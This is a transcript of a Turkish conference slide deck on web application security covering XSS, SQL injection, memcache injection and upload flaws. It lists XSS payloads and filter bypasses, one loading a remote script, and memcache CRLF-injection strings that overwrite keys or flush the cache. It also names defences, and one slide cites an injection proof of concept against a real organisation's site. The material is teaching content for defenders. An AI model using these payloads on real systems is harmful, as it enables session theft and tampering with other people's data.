web uygulama güvenliği (akademik bilişim 2016)
TRANSCRIPT
![Page 1: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/1.jpg)
Web Uygulama GüvenliğiAkademik Bilişim 2016
Ömer Çıtak
![Page 2: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/2.jpg)
#! whoami
Full-Stack Developer @ Cydets Inc.
development && security
www.omercitak.com
Social : @Om3rCitak
![Page 3: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/3.jpg)
#! cat index• Cross-site Scripting (XSS)
• SQL Injection
• Memcache Injection
• Upload Authentication
![Page 4: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/4.jpg)
#! ping-pong.jpg
![Page 5: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/5.jpg)
#! dont-trust-anyone.jpg
![Page 6: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/6.jpg)
#! cross-site-scripting• Reflected XSS• DOM Based XSS• Stored XSS
![Page 7: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/7.jpg)
#! reflected-xss.jpg
![Page 8: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/8.jpg)
#! reflected-xss-poc.jpg
![Page 9: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/9.jpg)
#! dom-based-xss.jpg
![Page 10: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/10.jpg)
#! stored-xss.jpg
![Page 11: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/11.jpg)
#! stored-xss-poc.jpg
![Page 12: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/12.jpg)
#! stored-xss-poc.jpg
![Page 13: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/13.jpg)
#! cat classic-xss-payloads• <script>alert(1)</script>• <img src="javascript:alert('XSS');">• <IFRAME SRC="javascript:alert('XSS');"></IFRAME>• <SCRIPT a=">"
SRC="http://omercitak.com/xss.js"></SCRIPT>• <video src=1 onerror=alert(1)>• <audio src=1 onerror=alert(1)>• <img src=x onerror=alert(1)">
![Page 14: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/14.jpg)
#! cat xss-bypass-payloads
• <scrscriptipt>alalertert(1)</scrscriptipt>• alert(String.fromCharCode(88,83,83))• <IMG
SRC=ja…………….')>• <IMG SRC='vbscript:msgbox("XSS")'>
![Page 15: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/15.jpg)
#! xss-protection-1.jpg• Strip Tags
– http://php.net/manual/tr/function.strip-tags.php
![Page 16: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/16.jpg)
#! xss-protection-2.jpg• HTML Special Chars
– http://php.net/manual/tr/function.htmlspecialchars.php
![Page 17: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/17.jpg)
#! xss-protection-3.jpg• HttpOnly Cookies (session_set_cookie_params)
![Page 18: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/18.jpg)
#! xss-protection-4.jpg
![Page 19: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/19.jpg)
#! xss-protection-4.jpg
![Page 20: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/20.jpg)
#! xss-demo.jpg
![Page 21: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/21.jpg)
#! sql-injection• Union Based SQL Injection• Blind SQL Injection• Time Based SQL Injection
![Page 22: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/22.jpg)
#! union-based-sql-injection.jpg
![Page 23: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/23.jpg)
#! sql-injection-login-bypass.jpg
![Page 24: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/24.jpg)
#! cat blind-sql-injection
• Ya hatalar gizlenmiş ise? (error_reporting(0))
• Ya mysql_* fonksiyonlarının başına «@» konulmuş ise?
![Page 25: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/25.jpg)
#! blind-sql-injection.jpg
Reis Yaradanöbür tarafta
sormayacak mı reisneden Blind Injection
denemedin diye?
![Page 26: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/26.jpg)
#! blind-sql-injection.jpg
![Page 27: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/27.jpg)
#! blind-sql-injection-poc.jpg
![Page 28: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/28.jpg)
#! blind-sql-injection-poc.jpg
![Page 29: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/29.jpg)
#! cat time-based-sql-injection• Ya arka planda çıktı vermeyen bir query çalışıyor
ise?– Count Query– Update Query– Insert Query– Delete Query– Relationship Query
![Page 30: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/30.jpg)
#! time-based-sql-injection.jpg
![Page 31: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/31.jpg)
#! time-based-sql-injection.jpgMySQL Server
Microsoft SQL Server
Oracle Server
![Page 32: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/32.jpg)
#! sql-injection-poc.jpgUluslararası Af Örgütü (amnesty.org.tr)
![Page 33: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/33.jpg)
#! sql-injection-poc.jpg
![Page 34: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/34.jpg)
#! sql-injection-demo.jpg
![Page 35: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/35.jpg)
#! memcache-injection
![Page 36: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/36.jpg)
#! using-memcache.jpg
![Page 37: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/37.jpg)
#! phpstorm memcached.php
![Page 38: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/38.jpg)
#! telnet 127.0.0.1 11211> set key 0 10 5 > value < STORED > get key < VALUE key 0 5 < value < END
![Page 39: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/39.jpg)
#! phpstorm memcached.php
![Page 40: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/40.jpg)
#! phpstorm memcached.php
![Page 41: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/41.jpg)
#! phpstorm memcached.php
![Page 42: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/42.jpg)
#! phpstorm memcached.php
![Page 43: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/43.jpg)
#! phpstorm memcached.php?key=omer 0 10 6 \r\n hacked \r\n
• urlencode(‘\r’) = %0d • urlencode(‘\n’) = %0a
?key=omer 0 10 6 %0d%0a hacked %0d%0a
![Page 44: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/44.jpg)
#! phpstorm memcached.php
> set omer 0 3600 6 > hacked < STORED > 123456 < ERROR
![Page 45: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/45.jpg)
#! phpstorm memcached.php?key=aaaaa…(251) set yenikey 0 3600 6 %0d%0a hacked %0d%0a
?key=a %00 set yenikey 0 3600 6 %0d%0a hacked %0d%0a
?key=aaaaa…(251) flush_all %0d%0a
![Page 46: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/46.jpg)
#! cat vulnerable-libraries
Python : Python-pylibmc Php : Memcached Asp.Net : memcacheddotnetproject (1.1.5) Java : com.meetup.memcached
![Page 47: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/47.jpg)
#! cat safe_libraries
Python : python-memcache Php : memcache Java : java.net.spy.memcached
![Page 48: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/48.jpg)
#! cat using-memcached-library
Wordpress Joomla 3.2.2 Piwik 2.1.0 MODX Revolution 2.3
![Page 49: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/49.jpg)
#! ascii-table.jpg
![Page 50: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/50.jpg)
#! phpstorm memcached.php
![Page 51: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/51.jpg)
#! upload-authentication
![Page 52: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/52.jpg)
#! upload-authentication-poc
![Page 53: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/53.jpg)
#! wget questions
![Page 54: Web Uygulama Güvenliği (Akademik Bilişim 2016)](https://reader033.vdocuments.pub/reader033/viewer/2022051502/5878abb01a28ab724c8b45c5/html5/thumbnails/54.jpg)
#! exit
Thanks <3
www.omercitak.com
Social : @Om3rCitak